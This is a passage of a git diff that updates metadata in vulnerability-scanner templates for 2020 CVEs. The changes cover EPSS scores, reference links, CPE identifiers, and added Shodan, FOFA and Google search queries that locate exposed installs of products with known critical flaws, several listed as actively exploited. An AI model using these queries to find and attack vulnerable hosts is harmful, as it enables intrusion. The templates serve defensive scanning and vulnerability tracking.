a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.5782 + epss-percentile: 0.58449 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 1d68e39a0b..7fde469b2a 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -19,13 +19,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - epss-score: 0.01122 - epss-percentile: 0.83087 + epss-score: 0.01244 + epss-percentile: 0.85477 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"car rental management system" + fofa-query: body="car rental management system" tags: cve,cve2020,lfi,car_rental_management_system_project,sqli http: diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 12e0d0c29b..d4742310cb 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - epss-score: 0.06718 - epss-percentile: 0.93156 + epss-score: 0.14147 + epss-percentile: 0.95695 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 0d94312140..69e589c909 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -20,16 +20,19 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29395 cwe-id: CWE-79 - epss-score: 0.05489 - epss-percentile: 0.93026 + epss-score: 0.03946 + epss-percentile: 0.91992 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: myeventon product: eventon framework: wordpress + fofa-query: wp-content/plugins/eventon/ + publicwww-query: /wp-content/plugins/eventon/ + shodan-query: http.html:/wp-content/plugins/eventon/ + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index c99a67e7fc..014ee1b3cb 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 - epss-score: 0.96219 - epss-percentile: 0.99483 + epss-score: 0.96125 + epss-percentile: 0.995 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: zyxel product: usg20-vpn_firmware shodan-query: title:"USG FLEX 100" + fofa-query: title="usg flex 100" + google-query: intitle:"usg flex 100" tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev http: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 949708267e..4705cb52ef 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -23,13 +23,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-3452 cwe-id: CWE-22,CWE-20 - epss-score: 0.97531 - epss-percentile: 0.99992 - cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + epss-score: 0.97484 + epss-percentile: 0.99971 + cpe: cpe:2.3:h:cisco:asa_5505:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cisco - product: adaptive_security_appliance_software + product: asa_5505 tags: cve,cve2020,lfi,kev,packetstorm,cisco http: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 9628bcfd78..8ed3be85fa 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - epss-score: 0.37649 - epss-percentile: 0.97105 + epss-score: 0.36584 + epss-percentile: 0.97167 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 61077bcd15..4a58de3baa 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 - epss-score: 0.29702 - epss-percentile: 0.96805 + epss-score: 0.2493 + epss-percentile: 0.96665 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 264d0c25b0..dd892cf895 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -28,6 +28,7 @@ info: vendor: opentsdb product: opentsdb shodan-query: html:"OpenTSDB" + fofa-query: body="opentsdb" tags: cve,cve2020,opentsdb,rce,packetstorm http: diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 2369c12c6a..175e774e0d 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - epss-score: 0.88428 - epss-percentile: 0.98435 + epss-score: 0.81728 + epss-percentile: 0.98365 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 9a790fd208..a8c5341f0a 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35580 cwe-id: CWE-22 epss-score: 0.01833 - epss-percentile: 0.87972 + epss-percentile: 0.88238 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 523a7bc555..6501f849b1 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - epss-score: 0.11153 - epss-percentile: 0.9467 + epss-score: 0.10057 + epss-percentile: 0.94902 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index de8226c5d2..1cbc6725b4 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.96729 - epss-percentile: 0.9964 + epss-score: 0.96521 + epss-percentile: 0.99601 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index e5df7fffc2..3c813132cc 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -13,13 +13,15 @@ info: - https://github.com/liftoff/GateOne/issues/747 - https://nvd.nist.gov/vuln/detail/CVE-2020-35736 - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/ + - https://github.com/20142995/Goby + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83699 + epss-percentile: 0.85176 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 6288515981..5f3bc76f8d 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -14,13 +14,15 @@ info: - https://twitter.com/ptswarm/status/1408050644460650502 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe - https://nvd.nist.gov/vuln/detail/CVE-2020-3580 + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors + - https://github.com/r0eXpeR/supplier classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97048 - epss-percentile: 0.99705 + epss-score: 0.97074 + epss-percentile: 0.99768 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 6018bad026..176ff3534b 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 - epss-score: 0.78767 - epss-percentile: 0.98182 + epss-score: 0.82607 + epss-percentile: 0.98409 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index b0f399f261..a1583675d8 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 - epss-score: 0.77399 - epss-percentile: 0.98139 + epss-score: 0.79056 + epss-percentile: 0.98269 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: agentejo product: cockpit shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index c6b3adbfe0..9e3fd91d47 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.75372 - epss-percentile: 0.98077 + epss-score: 0.80133 + epss-percentile: 0.98306 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: agentejo product: cockpit + shodan-query: http.favicon.hash:688609340 + fofa-query: icon_hash=688609340 tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo http: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 8136dd8f95..d1a397b88b 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index fe42828880..3413c23bbb 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 360492a082..85e049d8b4 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -28,6 +28,7 @@ info: vendor: rukovoditel product: rukovoditel shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index eb8c02320d..d8c4ba738a 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -27,6 +27,8 @@ info: max-request: 3 vendor: rukovoditel product: rukovoditel + shodan-query: http.favicon.hash:-1499940355 + fofa-query: icon_hash=-1499940355 tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 95be5d3413..46bb268528 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - epss-score: 0.40407 - epss-percentile: 0.9718 + epss-score: 0.40486 + epss-percentile: 0.97275 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index c7eb5e666a..c92d50c413 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36289 cwe-id: CWE-863 - epss-score: 0.91164 - epss-percentile: 0.98655 + epss-score: 0.96974 + epss-percentile: 0.99732 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index c3116b81e6..cf8a6981ad 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -28,6 +28,7 @@ info: vendor: smartstore product: smartstorenet shodan-query: http.html:'content="Smartstore' + fofa-query: body='content="smartstore' tags: cve2020,cve,redirect,smartstore http: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index b740c5d50a..e9c731ee45 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -32,6 +32,7 @@ info: vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 + fofa-query: icon_hash=-399298961 tags: cve,cve2020,ibm,xxe,disclosure http: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 07db650b42..059e084422 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -14,19 +14,23 @@ info: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5191 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00345 - epss-percentile: 0.68617 + epss-percentile: 0.71585 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: hospital_management_system + shodan-query: http.html:"hospital management system" + fofa-query: body="hospital management system" tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul http: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 1c118bfc6d..d9eb58a539 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -22,13 +22,15 @@ info: cve-id: CVE-2020-5192 cwe-id: CWE-89 epss-score: 0.38401 - epss-percentile: 0.96871 + epss-percentile: 0.97221 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpgurukul product: hospital_management_system + shodan-query: http.html:"hospital management system" + fofa-query: body="hospital management system" tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index f5b538a8f4..9d5fec6868 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -20,12 +20,14 @@ info: cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00213 - epss-percentile: 0.58675 + epss-percentile: 0.5933 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js + shodan-query: http.html:"/_next/static" + fofa-query: body="/_next/static" tags: cve,cve2020,nextjs,lfi,zeit http: diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 7154278d76..355108be0b 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -19,9 +19,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22,CWE-23 - epss-score: 0.96876 - epss-percentile: 0.99649 + cwe-id: CWE-23,CWE-22 + epss-score: 0.97175 + epss-percentile: 0.99813 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 0d65e91ace..9398930aac 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 - epss-score: 0.04038 - epss-percentile: 0.91885 + epss-score: 0.05608 + epss-percentile: 0.93255 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index daa7652cd1..54a16b4abc 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -34,6 +34,9 @@ info: max-request: 8 vendor: f5 product: big-ip_access_policy_manager + shodan-query: http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2020,bigip,rce,kev,packetstorm,f5 http: diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index e8aeb8c584..0ac3638945 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -13,13 +13,15 @@ info: reference: - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/ - https://nvd.nist.gov/vuln/detail/CVE-2020-6171 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48556 + epss-percentile: 0.48718 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index 74d1a8004d..eca65ab4a1 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-6207 cwe-id: CWE-306 - epss-score: 0.97437 - epss-percentile: 0.99941 + epss-score: 0.97439 + epss-percentile: 0.99945 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 3e57175d56..1b9566f020 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2020-6287 cwe-id: CWE-306 epss-score: 0.97502 - epss-percentile: 0.99977 + epss-percentile: 0.99982 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve,cve2020,sap,kev http: diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index af793bcf11..84b58f246b 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2020-6637 cwe-id: CWE-89 epss-score: 0.02067 - epss-percentile: 0.87871 + epss-percentile: 0.89008 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 vendor: os4ed product: opensis shodan-query: http.title:"openSIS" + fofa-query: title="opensis" + google-query: intitle:"opensis" tags: cve,cve2020,sqli,opensis,os4ed http: diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 177d7834d0..546a4901c2 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-6950 cwe-id: CWE-22 epss-score: 0.03924 - epss-percentile: 0.91792 + epss-percentile: 0.91979 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index c526b5ecea..fed8d4aa02 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.00395 - epss-percentile: 0.70653 + epss-percentile: 0.73354 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: product: ultimate_faq framework: wordpress tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign - flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index 21ef231eb1..e74fa6b18e 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-7136 cwe-id: CWE-288 epss-score: 0.26929 - epss-percentile: 0.96662 + epss-percentile: 0.96763 cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index fb7d0c80d6..0caa7b0e98 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -16,13 +16,17 @@ info: Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates + - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00065 - epss-percentile: 0.26966 + epss-percentile: 0.28395 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 19062c1aa3..67780e7931 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2020,zimbra,ssrf,oast,synacor http: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index c2bedd5d86..f731983123 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -14,13 +14,14 @@ info: - https://tickets.puppetlabs.com/browse/PDB-4876 - https://puppet.com/security/cve/CVE-2020-7943/ - https://nvd.nist.gov/vuln/detail/CVE-2020-7943 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-7943 cwe-id: CWE-276,NVD-CWE-noinfo - epss-score: 0.08068 - epss-percentile: 0.93691 + epss-score: 0.06791 + epss-percentile: 0.93863 cpe: cpe:2.3:a:puppet:puppet_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 0258e2200a..f125c68bcf 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -25,6 +25,8 @@ info: max-request: 2 vendor: liferay product: liferay_portal + shodan-query: http.favicon.hash:129457226 + fofa-query: icon_hash=129457226 tags: cve2020,cve,packetstorm,rce,liferay,kev http: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index b3a656ea66..758004ac96 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7980 cwe-id: CWE-78 - epss-score: 0.97015 - epss-percentile: 0.99726 + epss-score: 0.96876 + epss-percentile: 0.99703 cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliantech product: aptus_web shodan-query: http.title:"Intellian Aptus Web" + fofa-query: title="intellian aptus web" + google-query: intitle:"intellian aptus web" tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech http: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 96f7c732a6..c5e4150a32 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-8115 cwe-id: CWE-79 epss-score: 0.0187 - epss-percentile: 0.88123 + epss-percentile: 0.88393 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: revive-adserver product: revive_adserver + shodan-query: http.title:"revive adserver" + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve,cve2020,xss,hackerone,revive-adserver http: diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index e8c990527b..9a73648b69 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2020,rails,rce,hackerone,rubyonrails http: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 30301b6637..ea8b81d24a 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ 